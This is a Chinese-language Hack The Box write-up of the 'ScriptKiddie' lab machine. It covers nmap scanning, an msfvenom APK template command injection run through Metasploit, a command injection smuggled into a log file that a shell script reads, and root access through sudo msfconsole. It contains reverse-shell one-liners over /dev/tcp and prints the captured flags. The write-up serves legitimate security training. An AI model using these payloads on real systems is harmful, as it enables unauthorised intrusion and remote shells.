服务探测
开放端口
┌──(root㉿rock)-[~/htb/ScriptKiddie]
└─# nmap -p- --open 10.10.10.226
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-24 02:13 EDT
Nmap scan report for 10.10.10.226
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
Nmap done: 1 IP address (1 host up) scanned in 5.58 seconds
详细端口信息
┌──(root㉿rock)-[~/htb/ScriptKiddie]
└─# nmap -sV -Pn -A -O 10.10.10.226 -p 22,5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-24 02:17 EDT
Nmap scan report for 10.10.10.226
Host is up (0.0085s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 7.21 ms 10.10.16.1
2 2.95 ms 10.10.10.226
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.50 seconds
web
5000端口是一个执行各种命令的页面,尝试各种命令注入无果
我们留意到期中一个命令执行是生成一个msfvenom的payload,其中需要上传一个文件
linux上传.elf文件
windows上传.exe文件
安卓上传.apk文件
感觉入口应该是在这里
kali搜索msfvenom相关的漏洞
┌──(root💀kali)-[~/htb/ScriptKiddie]
└─# searchsploit msfvenom 130 ⨯
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
找到一个python版本的exp,但是我本地因为py的各种依赖问题不能成功执行,根据漏洞编号去到msf寻找这个漏洞的exp
msf6 exploit(multi/http/werkzeug_debug_rce) > search 2020-7384
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 2020-10-29 excellent No Rapid7 Metasploit Framework msfvenom APK Template Command Injection
载入,生成一个apk文件
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.apk yes The APK file name
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 207.246.124.194 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.16.2
lhost => 10.10.16.2
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
[+] msf.apk stored at /root/.msf4/local/msf.apk
通过首页上传到服务器,当服务器程序执行msfvenom时,本地收到一个rev shell
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Command shell session 1 opened (10.10.16.2:4444 -> 10.10.10.226:51136) at 2022-06-24 06:02:05 -0400
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
whoami
kid
拿到user.txt
ls
html
logs
snap
user.txt
cat user.txt
bb9561c6fe02ab1...
横向提权到pwn
切换成tty
python3 -c "__import__('pty').spawn('/bin/bash')"
反弹一个shell操作
bash -i >& /dev/tcp/10.10.16.2/4242 0>&1
发现一个bash脚本
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
留意有一个hackers日志文件
研究与这个日志相关的py代码我们留意这个函数
def searchsploit(text, srcip):
if regex_alphanum.match(text):
result = subprocess.check_output(['searchsploit', '--color', text])
return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))
else:
with open('/home/kid/logs/hackers', 'a') as f:
f.write(f'[{datetime.datetime.now()}] {srcip}\n')
return render_template('index.html', sserror="stop hacking me - well hack you back")
当检测到非法输入时,把时间和ip写入/home/kid/logs/hackers
f.write(f'[{datetime.datetime.now()}] {srcip}\n')
本地起一个py脚本,打印上面的输出,我们知道日志的格式是
[2022-06-28 17:34:11.250129] 127.0.0.1
查看hackers文件权限,尝试写入但是无法回显,原因是写入的内容被极快的清空了
kid@scriptkiddie:~/logs$ ll
ll
total 8
drwxrwxrwx 2 kid kid 4096 Feb 3 2021 ./
drwxr-xr-x 11 kid kid 4096 Feb 3 2021 ../
-rw-rw-r-- 1 kid pwn 0 Jul 1 06:54 hackers
证明:
kid@scriptkiddie:~/html$ echo "[2021-05-28 12:37:32.655374] 127.0.0.1" > hackers; cat hackers; echo sleep; sleep 1; cat hackers; echo done
<ackers; echo sleep; sleep 1; cat hackers; echo done
[2021-05-28 12:37:32.655374] 127.0.0.1
sleep
[2021-05-28 12:37:32.655374] 127.0.0.1
done
kid@scriptkiddie:~/html$
scanlosers.sh里的这句其实是把IP从日志抽取出来
cat $log | cut -d' ' -f3- | sort -u
然后执行nmap命令
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
${ip}是我们可以控制的输入,因此存在命令注入
使用下面payload
echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.16.2/4242 0>&1' # ." > /home/kid/logs/hackers
成功横移到pwn用户
┌──(root💀kali)-[~/htb/ScriptKiddie]
└─# nc -lnvp 4242 1 ⨯
listening on [any] 4242 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.226] 52008
bash: cannot set terminal process group (875): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ whoami
whoami
pwn
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$
提权到root
直接进入msf
sudo /opt/metasploit-framework-6.0.9/msfconsole
在msf是可以直接执行命令的,读取root.txt
msf6 > cat root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat root.txt
ed5898b933e2c05d61d5792aa1bb416a
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > whoami
stty: 'standard input': Inappropriate ioctl for device
[*] exec: whoami
root
网友评论